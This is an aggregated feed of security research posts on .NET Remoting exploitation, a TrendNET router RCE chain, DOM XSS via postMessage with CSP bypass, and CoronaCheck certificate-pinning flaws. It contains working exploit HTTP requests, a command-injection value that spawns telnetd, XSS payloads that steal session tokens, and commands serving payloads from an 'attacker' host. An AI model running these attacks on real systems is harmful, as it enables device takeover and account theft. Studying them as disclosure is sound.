Normal view

There are new articles available, click to refresh the page.
Before yesterdayVulnerabily Research

Windows Drivers Reverse Engineering Methodology

By: voidsec
20 January 2022 at 15:30

With this blog post I’d like to sum up my year-long Windows Drivers research; share and detail my own methodology for reverse engineering (WDM) Windows drivers, finding some possible vulnerable code paths as well as understanding their exploitability. I’ve tried to make it as “noob-friendly” as possible, documenting all the steps I usually perform during […]

The post Windows Drivers Reverse Engineering Methodology appeared first on VoidSec.

.NET Remoting Revisited

27 January 2022 at 14:49

.NET Remoting is the built-in architecture for remote method invocation in .NET. It is also the origin of the (in-)famous BinaryFormatter and SoapFormatter serializers and not just for that reason a promising target to watch for.

This blog post attempts to give insights into its features, security measures, and especially its weaknesses/vulnerabilities that often result in remote code execution. We're also introducing major additions to the ExploitRemotingService tool, a new ObjRef gadget for YSoSerial.Net, and finally a RogueRemotingServer as counterpart to the ObjRef gadget.

If you already understand the internal of .NET Remoting, you may skip the introduction and proceed right with Security Features, Pitfalls, and Bypasses.

Introduction

.NET Remoting is deeply integrated into the .NET Framework and allows invocation of methods across so called remoting boundaries. These can be different app domains within a single process, different processes on the same computer, or different processes on different computers. Supported transports between the client and server are HTTP, IPC (named pipes), and TCP.

Here is a simple example for illustration: the server creates and registers a transport server channel and then registers the class as a service with a well-known name at the server's registry:

var channel = new TcpServerChannel(12345);
ChannelServices.RegisterChannel(channel);
RemotingConfiguration.RegisterWellKnownServiceType(
    typeof(MyRemotingClass),
    "MyRemotingClass"
);

Then a client just needs the URL of the registered service to do remoting with the server:

var remote = (MyRemotingClass)RemotingServices.Connect(
    typeof(MyRemotingClass),
    "tcp://remoting-server:12345/MyRemotingClass"
);

With this, every invocation of a method or property accessor on remote gets forwarded to the remoting server, executed there, and the result gets returned to the client. This all happens transparently to the developer.

And although .NET Remoting has already been deprecated with the release of .NET Framework 3.0 in 2009 and is no longer available on .NET Core and .NET 5+, it is still around, even in contemporary enterprise level software products.

Remoting Internals

If you are interested in how .NET Remoting works under the hood, here are some insights.

In simple terms: when the client connects to the remoting object provided by the server, it creates a RemotingProxy that implements the specified type MyRemotingClass. All method invocations on remote at the client (except for GetType() and GetHashCode()) will get sent to the server as remoting calls. When a method gets invoked on remote, the proxy creates a MethodCall object that holds the information of the method and passed parameters. It is then passed to a chain of sinks that prepare the MethodCall and handle the remoting communication with the server over the given transport.

On the server side, the received request is also passed to a chain of sinks that reverses the process, which also includes deserialization of the MethodCall object. It ends in a dispatcher sink, which invokes the actual implementation of the method with the passed parameters. The result of the method invocation is then put in a MethodResponse object and gets returned to the client where the client sink chain deserializes the MethodResponse object, extracts the returned object and passes it back to the RemotingProxy.

Channel Sinks

When the client or server creates a channel (either explicitly or implicitly by connecting to a remote service), it also sets up a chain of sinks for processing outgoing and incoming requests. For the server chain, the first sink is a transport sink, followed by formatter sinks (this is where the BinaryFormatter and SoapFormatter are used), and ending in the dispatch sink. It is also possible to add custom sinks. For the three transports, the server default chains are as follows:

  • HttpServerChannel:
    HttpServerTransportSinkSdlChannelSinkSoapServerFormatterSinkBinaryServerFormatterSinkDispatchChannelSink
  • IpcServerChannel:
    IpcServerTransportSinkBinaryServerFormatterSinkSoapServerFormatterSinkDispatchChannelSink
  • TcpServerChannel:
    TcpServerTransportSinkBinaryServerFormatterSinkSoapServerFormatterSinkDispatchChannelSink

On the client side, the sink chain looks similar but in reversed order, so first a formatter sink and finally the transport sink:

Note that the default client sink chain has a default formatter for each transport (HTTP uses SOAP, IPC and TCP use binary format) while the default server sink chain can process both formats. The default sink chains are only used if the channel was not created with an explicit IClientChannelSinkProvider and/or IServerChannelSinkProvider.

Passing Parameters and Return Values

Parameter values and return values can be transfered in two ways:

  • by value: if either the type is serializable (cf. Type.IsSerializable) or if there is a serialization surrogate for the type (see following paragraphs)
  • by reference: if type extends MarshalByRefObject (cf. Type.IsMarshalByRef)

In case of the latter, the objects need to get marshaled using one of the RemotingServices.Marshal methods. They register the object at the server's registry and return a ObjRef instance that holds the URL and type information of the marshaled object.

The marshaling happens automatically during serialization by the serialization surrogate class RemotingSurrogate that is used for the BinaryFormatter/SoapFormatter in .NET Remoting (see CoreChannel.CreateBinaryFormatter(bool, bool) and CoreChannel.CreateSoapFormatter(bool, bool)). A serialization surrogate allows to customize serialization/deserialization of specified types.

In case of objects extending MarshalByRefObject, the RemotingSurrogateSelector returns a RemotingSurrogate (see RemotingSurrogate.GetSurrogate(Type, StreamingContext, out ISurrogateSelector)). It then calls the RemotingSurrogate.GetObjectData(Object, SerializationInfo, StreamingContext) method, which calls the RemotingServices.GetObjectData(object, SerializationInfo, StreamingContext), which then calls RemotingServices.MarshalInternal(MarshalByRefObject, string, Type). That basically means, every remoting object extending MarshalByRefObject is substituted with a ObjRef and thus passed by reference instead of by value.

On the receiving side, if an ObjRef gets deserialized by the BinaryFormatter/SoapFormatter, the IObjectReference.GetRealObject(StreamingContext) implementation of ObjRef gets called eventually. That interface method is used to replace an object during deserialization with the object returned by that method. In case of ObjRef, the method results in a call to RemotingServices.Unmarshal(ObjRef, bool), which creates a RemotingProxy of the type and target URL specified in the deserialized ObjRef.

That means, in .NET Remoting all objects extending MarshalByRefObject are passed by reference using an ObjRef. And deserializing an ObjRef with a BinaryFormatter/SoapFormatter (not just limited to .NET Remoting) results in the creation of a RemotingProxy.

With this knowledge in mind, it should be easier to follow the rest of this post.

Previous Work

Most of the issues of .NET Remoting and the runtime serializers BinaryFormatter/SoapFormatter have already been identified by James Forshaw:

We highly encourage you to take the time to read the papers/posts. They are also the foundation of the ExploitRemotingService tool that will be detailed in ExploitRemotingService Explained further down in this post.

Security Features, Pitfalls, and Bypasses

The .NET Remoting is fairly configurable. The following security aspects are built-in and can be configured using special channel and formatter properties:

HTTP Channel IPC Channel TCP Channel
Authentication n/a n/a
  • secure=bool channel property
  • ISecurableChannel.IsSecured (via NegotiateStream; default: false)
Authorization n/a
  • authorizationGroups=Windows/AD Group channel property (default: thread owner is allowed, NT Authority\Network group (SID S-1-5-2) is denied)
  • CommonSecurityDescriptor passed to a IpcServerChannel constructor
custom IAuthorizeRemotingConnection class
  • authorizationModule channel property
  • passed to TcpServerChannel constructor
Impersonation n/a impersonate=bool (default: false) impersonate=bool (default: false)
Conf., Int., Auth. Protection n/a n/a protectionLevel={None, Sign, EncryptAndSign} channel property
Interface Binding n/a n/a rejectRemoteRequests=bool (loopback only, default: false), bindTo=address (specific IP address, default: n/a)

Pitfalls and important notes on these security features:

HTTP Channel
  • No security features provided; ought to be implemented in IIS or by custom server sinks.
IPC Channel
  • By default, access to named pipes created by the IPC server channel are denied to NT Authority\Network group (SID S-1-5-2), i. e., they are only accessible from the same machine. However, by using authorizationGroup, the network restriction is not in place so that the group that is allowed to access the named pipe may also do it remotely (not supported by the default IpcClientTransportSink, though).
TCP Channel
  • With a secure TCP channel, authentication is required. However, if no custom IAuthorizeRemotingConnection is configured for authorization, it is possible to logon with any valid Windows account, including NT Authority\Anonymous Logon (SID S-1-5-7).

ExploitRemotingService Explained

James Forshaw also released ExploitRemotingService, which contains a tool for attacking .NET Remoting services via IPC/TCP by the various attack techniques. We'll try to explain them here.

There are basically two attack modes:

raw
Exploit BinaryFormatter/SoapFormatter deserialization (see also YSoSerial.Net)
all others commands (see -h)
Write a FakeAsm assembly to the server's file system, load a type from it to register it at the server to be accessible via the existing .NET Remoting channel. It is then accessible via .NET Remoting and can perform various commands.

To see the real beauty of his sorcery and craftsmanship, we'll try to explain the different operating options for the FakeAsm exploitation and their effects:

without options
Send a FakeMessage that extends MarshalByRefObject and thus is a reference (ObjRef) to an object on the attacker's server. On deserialization, the victim's server creates a proxy that transparently forwards all method invocations to the attacker's server. By exploiting a TOCTOU flaw, the get_MethodBase() property method of the sent message (FakeMessage) can be adjusted so that even static methods can be called. This allows to call File.WriteAllBytes(string, byte[]) on the victim's machine.
--useser
Send a forged Hashtable with a custom IEqualityComparer by reference that implements GetHashCode(object), which gets called by the victim server on the attacker's server remotely. As for the key, a FileInfo/DirectoryInfo object is wrapped in SerializationWrapper that ensures the attacker's object gets marshaled by value instead of by reference. However, on the remote call of GetHashCode(object), the victim's server sends the FileInfo/DirectoryInfo by reference so that the attacker has a reference to the FileInfo/DirectoryInfo object on the victim.
--uselease
Call MarshalByRefObject.InitializeLifetimeService() on a published object to get an ILease instance. Then call Register(ISponsor) with an MarshalByRefObject object as parameter to make the server call the IConvertible.ToType(Type, IformatProvider) on an object of the attacker's server, which then can deliver the deserialization payload.

Now the problem with the --uselease option is that the remote class needs to return an actual ILease object and not null. This may happen if the virtual MarshalByRefObject.InitializeLifetimeService() method is overriden. But the main principle of sending an ObjRef referencing an object on the attacker's server can be generalized with any method accepting a parameter. That is why we have added the --useobjref to ExploitRemotingService (see also Community Contributions further below):

--useobjref
Call the MarshalByRefObject.GetObjRef(Type) method with an ObjRef as parameter value. Similarly to --uselease, the server calls IConvertible.ToType(Type, IformatProvider) on the proxy, which sends a remoting call to the attacker's server.

Security Measures and Troubleshooting

If no custom errors are enabled and a RemotingException gets returned by the server, the following may help to identify the cause and to find a solution:

Error Reason ExampleRemotingService Options ExploitRemotingService Bypass Options
"Requested Service not found" The URI of an existing remoting service must be known; there is no way to iterate them. n/a --nulluri may work if remoting service has not been servicing any requests yet.
NotSupportedException with link to KB 390633 Disallow received IMessage being MarshalByRefObject (see AppSettings.AllowTransparentProxyMessage) -d --uselease, --useobjref
SecurityException with PermissionSet info Code Access Security (CAS) restricted permissions in place (TypeFilterLevel.Low) -t low --uselease, --useobjref

Community Contributions

Our research on .NET Remoting led to some new insights and discoveries that we want to share with the community. Together with this blog post, we have prepared the following contributions and new releases.

ExploitRemotingService

The ExploitRemotingService is already a magnificent tool for exploiting .NET Remoting services. However, we have made some additions to ExploitRemotingService that we think are worthwhile:

--useobjref option
This newly added option allows to use the ObjRef trick described
--remname option
Assemblies can only be loaded by name once. If that loading fails, the runtime remembers that and avoids trying to load it again. That means, writing the FakeAsm.dll to the target server's file system and loading a type from that assembly must succeed on the first attempt. The problem here is to find the proper location to write the assembly to where it will be searched by the runtime (ExploitRemotingService provides the options --autodir and --installdir=… to specify the location to write the DLL to). We have modified ExploitRemotingService to use the --remname to name the FakeAsm assembly so that it is possible to have multiple attempts of writing the assembly file to an appropriate location.
--ipcserver option
As IPC server channels may be accessible remotely, the --ipcserver option allows to specify the server's name for a remote connection.

YSoSerial.Net

The new ObjRef gadget is basically the equivalent of the sun.rmi.server.UnicastRef class used by the JRMPClient gadget in ysoserial for Java: on deserialization via BinaryFormatter/SoapFormatter, the ObjRef gets transformed to a RemotingProxy and method invocations on that object result in the attempt to send an outgoing remote method call to a specified target .NET Remoting endpoint. This can then be used with the RogueRemotingServer described below.

RogueRemotingServer

The newly released RogueRemotingServer is the counterpart of the ObjRef gadget for YSoSerial.Net. It is the equivalent to the JRMPListener server in ysoserial for Java and allows to start a rogue remoting server that delivers a raw BinaryFormatter/SoapFormatter payload via HTTP/IPC/TCP.

Example of ObjRef Gadget and RogueRemotingServer

Here is an example of how these tools can be used together:

# generate a SOAP payload for popping MSPaint
ysoserial.exe -f SoapFormatter -g TextFormattingRunProperties -o raw -c MSPaint.exe
  > MSPaint.soap

# start server to deliver the payload on all interfaces
RogueRemotingServer.exe --wrapSoapPayload http://0.0.0.0/index.html MSPaint.soap
# test the ObjRef gadget with the target http://attacker/index.html
ysoserial.exe -f BinaryFormatter -g ObjRef -o raw -c http://attacker/index.html -t

During deserialization of the ObjRef gadget, an outgoing .NET Remoting method call request gets sent to the RogueRemotingServer, which replies with the TextFormattingRunProperties gadget payload.

Conclusion

.NET Remoting has already been deprecated long time ago for obvious reasons. If you are a developer, don't use it and migrate from .NET Remoting to WCF.

If you have detected a .NET Remoting service and want to exploit it, we'll recommend the excellent ExploitRemotingService by James Forshaw that works with IPC and TCP (for HTTP, have a look at Finding and Exploiting .NET Remoting over HTTP using Deserialisation by Soroush Dalili). If that doesn't succeed, you may want to try it with the enhancements added to our fork of ExploitRemotingService, especially the --useobjref technique and/or naming the FakeAsm assembly via --remname might help. And even if none of these work, you may still be able to invoke arbitrary methods on the exposed objects and take advantage of that.

TrendNET AC2600 RCE via WAN

31 January 2022 at 14:03

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore only a subset of issues disclosed in TRA-2021–54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of the devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement. All of its services are exposed via the WAN interface by default. Unfortunately for us, however, they’re exposed only via IPv6. Due to an oversight in the default firewall rules for the device, there are no restrictions made to IPv6, which is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/setup_wizard.asp
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt syslog command file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/adm_syslog.asp
Cookie: compact_display_state=false
ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1&1629923014463=1629923014463

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier of entry in discovering these devices, we don’t expect widespread exploitation. That said, it’s a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.


TrendNET AC2600 RCE via WAN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Solving DOM XSS Puzzles

3 February 2022 at 00:05

DOM-based Cross-site scripting (XSS) vulnerabilities rank as one of my favourite vulnerabilities to exploit. It's a bit like solving a puzzle; sometimes you get a corner piece like $.html(), other times you have to rely on trial-and-error. I recently encountered two interesting postMessage DOM XSS vulnerabilities in bug bounty programs that scratched my puzzle-solving itch.

Note: Some details have been anonymized.

Puzzle A: The Postman Problem

postMessage emerged in recent years as a common source of XSS bugs. As developers moved to client-side JavaScript frameworks, classic server-side rendered XSS vulnerabilities disappeared. Instead, frontends used asynchronous communication streams such as postMessage and WebSockets to dynamically modify content.

I keep an eye out for postMessage calls with Frans Rosén's postmessage-tracker tool. It's a Chrome extension that helpfully alerts you whenever it detects a postMessage call and enumerates the path from source to sink. However, while postMessage calls abound, most tend to be false positives and require manual validation.

While browsing Company A’s website at https://feedback.companyA.com/, postmessage-tracker notified me of a particularly interesting call originating from an iFrame https://abc.cloudfront.net/iframe_chat.html:

window.addEventListener("message", function(e) {
...
    } else if (e.data.type =='ChatSettings') {
         if (e.data.iframeChatSettings) {
             window.settingsSync =  e.data.iframeChatSettings;
...

The postMessage handler checked if the message data (e.data) contained a type value matching ChatSettings. If so, it set window.settingsSync to e.data.iframeChatSettings. It did not perform any origin checks – always a good sign for bug hunters since the message could be sent from any attacker-controled domain.

What was window.settingsSync used for? By searching for this string in Burp, I discovered https://abc.cloudfront.net/third-party.js:

else if(window.settingsSync.environment == "production"){
  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'
}
var url = domain+'/public/ext_data'

request.open('POST', url, true);
request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
request.onload = function () {
  if (request.status == 200) {
    var data = JSON.parse(this.response);
...
    window.settingsSync = data;
...
    var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js';
    loadScript(document, newScript);

If window.settingsSync.environment == "production”, window.settingsSync.region would be rearranged into subdomain and inserted into domain = 'https://'+subdomain+'.settingsSync.com. This URL would then be used in a POST request. The response would be parsed as a JSON and set window.settingsSync. Next, window.settingsSync.versionNumber was used to construct a URL that loaded a new JavaScript file var newScript = 'https://abc.cloudfront.net/module-v'+window.settingsSync.versionNumber+'.js'.

In a typical scenario, the page would load https://abc.cloudfront.net/module-v2.js:

config = window.settingsSync.config;
…
eval("window.settingsSync.configs."+config)

Aha! eval was a simple sink that executed its string argument as JavaScript. If I controlled config, I could execute arbitrary JavaScript!

However, how could I manipulate domain to match my malicious server instead of *.settingsSync.com? I inspected the code again:

  var region = window.settingsSync.region;
  var subdomain = region.split("_")[1]+'-'+region.split("_")[0]
  domain = 'https://'+subdomain+'.settingsSync.com'

I noticed that due to insufficient sanitisation and simple concatenation, a window.settingsSync.region value like .my.website/malicious.php?_bad would be rearranged into https://bad-.my.website/malicious.php?.settingsSync.com! Now domain pointed to bad-.my.website, a valid attacker-controlled domain served a malicious payload to the POST request.

Diagram 1

I created malicious.php on my server to send a valid response by capturing the responses from the origin target. I modified the name of the selected config to my XSS payload:

<?php
$origin = $_SERVER['HTTP_ORIGIN'];
header('Access-Control-Allow-Origin: ' . $origin);
header('Access-Control-Allow-Headers: cache-control');
header("Content-Type: application/json; charset=UTF-8");

echo '{
    "versionNumber": "2",
    "config": “a;alert()//“,
    "configs": {
        "a": "a"
    }
    ...
}'
?>

Based on this response, the sink would now execute:

eval("window.settingsSync.configs.a;alert()//”)

From my own domain, I spawned the page containing the vulnerable iFrame with var child = window.open("https://feedback.companyA.com/"), then sent the PostMessage payload with child.frames[1].postMessage(...). With that, the alert box popped!

However, I still needed one final piece. Since the XSS executed in the context of an iFrame https://abc.cloudfront.net/iframe_chat.html instead of https://feedback.companyA.com/, there was no actual impact; it was as good as executing XSS on an external domain. I needed to somehow leverage this XSS in the iFrame to reach the parent window https://feedback.companyA.com/.

Thankfully, https://feedback.companyA.com/ included yet another interesting postMessage handler:

    }, d = document.getElementById("iframeChat"), window.addEventListener("message", function(m) {
        var e;
        "https://abc.cloudfront.net" === m.origin && ("IframeLoaded" == m.data.type && d.contentWindow.postMessage({
            type: "credentialConfig",
            credentialConfig: credentialConfig
        }, "*"))

https://feedback.companyA.com/ created a PostMessage listener that validated the message origin as https://abc.cloudfront.net. If the message data type was IframeLoaded, it sent a PostMessage back with credentialConfig data.

credentialConfig included a session token:

{
    "region": "en-uk",
    "environment": "production",
    "userId": "<USERID>",
    "sessionToken": "Bearer <SESSIONTOKEN>"
}

Thus, by sending the PostMessage to trigger an XSS on https://abc.cloudfront.net/iframe_chat.html, the XSS would then run arbitrary JavaScript that sent another PostMessage from https://abc.cloudfront.net/iframe_chat.html to https://feedback.companyA.com/ which would leak the session token.

Based on this, I modified the XSS payload:

{
    "versionNumber": "2",
    "config": "a;window.addEventListener(`message`, (event) => {alert(JSON.stringify(event.data))});parent.postMessage({type:`IframeLoaded`},`*`)//",
    "configs": {
        "a": "a
    }
}

The XSS received the session data from the parent iFrame on https://feedback.companyA.com/ and exfiltrated the stolen sessionToken to an attacker-controlled server (I simply used alert here).

Puzzle B: Bypassing CSP with Newline Open Redirect

While exploring the OAuth flow of Company B, I noticed something strange about its OAuth authorization page. Typically, OAuth authorization pages present some kind of confirmation button to link an account. For example, here's Twitter's OAuth authorization page to login to GitLab:

OAuth Login

Company B's page used a URL with the following format: https://accept.companyb/confirmation?domain=oauth.companyb.com&state=<STATE>&client=<CLIENT ID>. Once the page was loaded, it would dynamically send a GET request to oauth.companyb.com/oauth_data?clientID=<CLIENT ID>. This returned some data to populate the page's contents:

{
    "app": {
        "logoUrl": <PAGE LOGO URL>,
        "name": <NAME>,
        "link": <URL> ,
        "introduction": "A cool app!"
        ...
    }
}

By playing around with this response data, I realised that introduction was injected into the page without any sanitisation. If I could control the destination of the GET request and subsequently the response, it would be possible to cause an XSS.

Fortunately, it appeared that the domain parameter allowed me to control the domain of the GET request. However, when I set this to my own domain, the request failed to execute and raised a Content Security Policy (CSP) error. I quickly checked the CSP of the page:

Content-Security-Policy: default-src 'self' 'unsafe-inline' *.companyb.com *.amazonaws.com; script-src 'self' https: *.companyb.com; object-src 'none';

When dynamic HTTP requests are made, they adhere to the connect-src CSP rule. In this case, the default-src rule meant that only requests to *.companyb.com and *.amazonaws.com were allowed. Unfortunately for the company, *.amazonaws.com created a big loophole: since AWS S3 files are hosted on *.s3.amazonaws.com, I could still send requests to my attacker-controlled bucket! Furthermore, CORS would not be an issue as AWS allows users to set the CORS policies of buckets.

I quickly hosted a JSON file with text as <script>alert()</script> on https://myevilbucket.s3.amazonaws.com/oauth_data.json, then browsed to https://accept.companyb/confirmation?domain=myevilbucket.s3.amazonaws.com%2f payload.json%3F&state=<STATE>&client=<CLIENT ID>. The page successfully requested my file at https://myevilbucket.s3.amazonaws.com/payload.json?/oauth_data?clientID=<CLIENT ID>, then... nothing.

One more problem remained: the CSP for script-src only allowed for self or *.companyb.com for HTTPS. Luckily, I had an open redirect on t.companyb.com saved for such situations. The vulnerable endpoint would redirect to the value of the url parameter but validate if the parameter ended in companyb.com. However, it allowed a newline character %0A in the subdomain section, which would be truncated by browsers such that http://t.companyb.com/redirect?url=http%3A%2F%2Fevil.com%0A.companyb.com%2F actually redirected to https://evil.com/%0A.companyb.com/ instead.

By using this bypass to create an open redirect, I saved my final XSS payload in <NEWLINE CHARACTER>.companyb.com in my web server's document root. I then injected a script tag with src pointing to the open redirect which passed the CSP but eventually redirected to the final payload.

Diagram 2

Conclusion

Both companies awarded bonuses for my XSS reports due to their complexity and ability to bypass hardened execution environments. I hope that by documenting my thought processes, you can also gain a few extra tips to solve DOM XSS puzzles.

CoronaCheck App TLS certificate vulnerabilities

3 February 2022 at 00:00

During the pandemic a lot of software has seen an explosive growth of active users, such as the software used for working from home. In addition, completely new applications have been developed to track and handle the pandemic, like those for Bluetooth-based contact tracing. These projects have been a focus of our research recently. With projects growing this quickly or with a quick deadline for release, security is often not given the required attention. It is therefore very useful to contribute some research time to improve the security of the applications all of us suddenly depend on. Previously, we have found vulnerabilities in Zoom and Proctorio. This blog post will detail some vulnerabilities in the Dutch CoronaCheck app we found and reported. These vulnerabilities are related to the security of the connections used by the app and were difficult to exploit in practice. However, it is a little worrying to find this many vulnerabilities in an app for which security is of such critical importance.

Background

The CoronaCheck app can be used to generate a QR code proving that the user has received either a COVID-19 vaccination, has recently received a negative test result or has recovered from COVID-19. A separate app, the CoronaCheck Verifier can be used to check these QR codes. These apps are used to give access to certain locations or events, which is known in The Netherlands as “Testen voor Toegang”. They may also be required for traveling to specific countries. The app used to generate the QR code is refered to in the codebase as the Holder app to distinguish it from the Verifier app. The source code of these apps is available on Github, although active development takes place in a separate non-public repository. At certain intervals, the public source code is updated from the private repository.

The Holder app:

The Verifier app:

The verification of the QR codes uses two different methods, depending on whether the code is for use in The Netherlands or internationally. The cryptographic process is very different for each. We spent a bit of time looking at these two processes, but found no (obvious) vulnerabilities.

Then we looked at the verification of the connections set up by the two apps. Part of the configuration of the app needs to be downloaded from a server hosted by the Ministerie van Volksgezondheid, Welzijn en Sport (VWS). This is because test results are retrieved by the app directly from the test provider. This means that the Holder app needs to know which test providers are used right now, how to connect to them and the Verifier app needs to know what keys to use to verify the signatures for that test provider. The privacy aspects of this design are quite good: the test provider only knows the user retrieved the result, but not where they are using it. VWS doesn’t know who has done a test or their results and the Verifier only sees the limited personal information in the QR which is needed to check the identity of the holder. The downside of this is that blocking a specific person’s QR code is difficult.

Strict requirements were formulated for the security of these connections in the design. See here (in Dutch). This includes the use of certificate pinning to check that the certificates are issued a small set of Certificate Authorities (CAs). In addition to the use of TLS, all responses from the APIs must be signed using a signature. This uses the PKCS#7 Cryptographic Message Syntax (CMS) format.

Many of the checks on certificates that were added in the iOS app contained subtle mistakes. Combined, only one implicit check on the certificate (performed by App Transport Security) was still effective. This meant that there was no certificate pinning at all and any malicious CA could generate a certificate capable of intercepting the connections between the app and VWS or a test provider.

Certificate check issues

An iOS app that wants to handle the checking of TLS certificates itself can do so by implementing the delegate method urlSession(_:didReceive:completionHandler:). Whenever a new connection is created, this method is called allowing the app to perform its own checks. It can respond in three different ways: continue with the usual validation (performDefaultHandling), accept the certificate (useCredential) or reject the certificate (cancelAuthenticationChallenge). This function can also be called for other authentication challenges, such as HTTP basic authentication, so it is common to check that the type is NSURLAuthenticationMethodServerTrust first.

This was implemented as follows in SecurityStrategy.swift lines 203 to 262:

203func checkSSL() {
204
205    guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
206          let serverTrust = challenge.protectionSpace.serverTrust else {
207
208        logDebug("No security strategy")
209        completionHandler(.performDefaultHandling, nil)
210        return
211    }
212
213    let policies = [SecPolicyCreateSSL(true, challenge.protectionSpace.host as CFString)]
214    SecTrustSetPolicies(serverTrust, policies as CFTypeRef)
215    let certificateCount = SecTrustGetCertificateCount(serverTrust)
216
217    var foundValidCertificate = false
218    var foundValidCommonNameEndsWithTrustedName = false
219    var foundValidFullyQualifiedDomainName = false
220
221    for index in 0 ..< certificateCount {
222
223        if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, index) {
224            let serverCert = Certificate(certificate: serverCertificate)
225
226            if let name = serverCert.commonName {
227                if name.lowercased() == challenge.protectionSpace.host.lowercased() {
228                    foundValidFullyQualifiedDomainName = true
229                    logVerbose("Host matched CN \(name)")
230                }
231                for trustedName in trustedNames {
232                    if name.lowercased().hasSuffix(trustedName.lowercased()) {
233                        foundValidCommonNameEndsWithTrustedName = true
234                        logVerbose("Found a valid name \(name)")
235                    }
236                }
237            }
238            if let san = openssl.getSubjectAlternativeName(serverCert.data), !foundValidFullyQualifiedDomainName {
239                if compareSan(san, name: challenge.protectionSpace.host.lowercased()) {
240                    foundValidFullyQualifiedDomainName = true
241                    logVerbose("Host matched SAN \(san)")
242                }
243            }
244            for trustedCertificate in trustedCertificates {
245
246                if openssl.compare(serverCert.data, withTrustedCertificate: trustedCertificate) {
247                    logVerbose("Found a match with a trusted Certificate")
248                    foundValidCertificate = true
249                }
250            }
251        }
252    }
253
254    if foundValidCertificate && foundValidCommonNameEndsWithTrustedName && foundValidFullyQualifiedDomainName {
255        // all good
256        logVerbose("Certificate signature is good for \(challenge.protectionSpace.host)")
257        completionHandler(.useCredential, URLCredential(trust: serverTrust))
258    } else {
259        logError("Invalid server trust")
260        completionHandler(.cancelAuthenticationChallenge, nil)
261    }
262}

If an app wants to implement additional verification checks, then it is common to start with performing the platform’s own certificate validation. This also means that the certificate chain is resolved. The certificates received from the server may be incomplete or contain additional certificates, by applying the platform verification a chain is constructed ending in a trusted root (if possible). An app that uses a private root could also do this, but while adding the root as the only trust anchor.

This leads to the first issue with the handling of certificate validation in the CoronaCheck app: instead of giving the “continue with the usual validation” result, the app would accept the certificate if its own checks passed (line 257). This meant that the checks are not additions to the verification, but replace it completely. The app does implicitly perform the platform verification to obtain the correct chain (line 215), but the result code for the validation was not checked, so an untrusted certificate was not rejected here.

The app performs 3 additional checks on the certificate:

  • It is issued by one of a list of root certificates (line 246).
  • It contains a Subject Alternative Name containing a specific domain (line 238).
  • It contains a Common Name containing a specific domain (lines 227 and 232).

For checking the root certificate the resolved chain is used and each certificate is compared to a list of certificates hard-coded in the app. This set of roots depends on what type of connection it is. Connections to the test providers are a bit more lenient, while the connection to the VWS servers itself needs to be issued by a specific root.

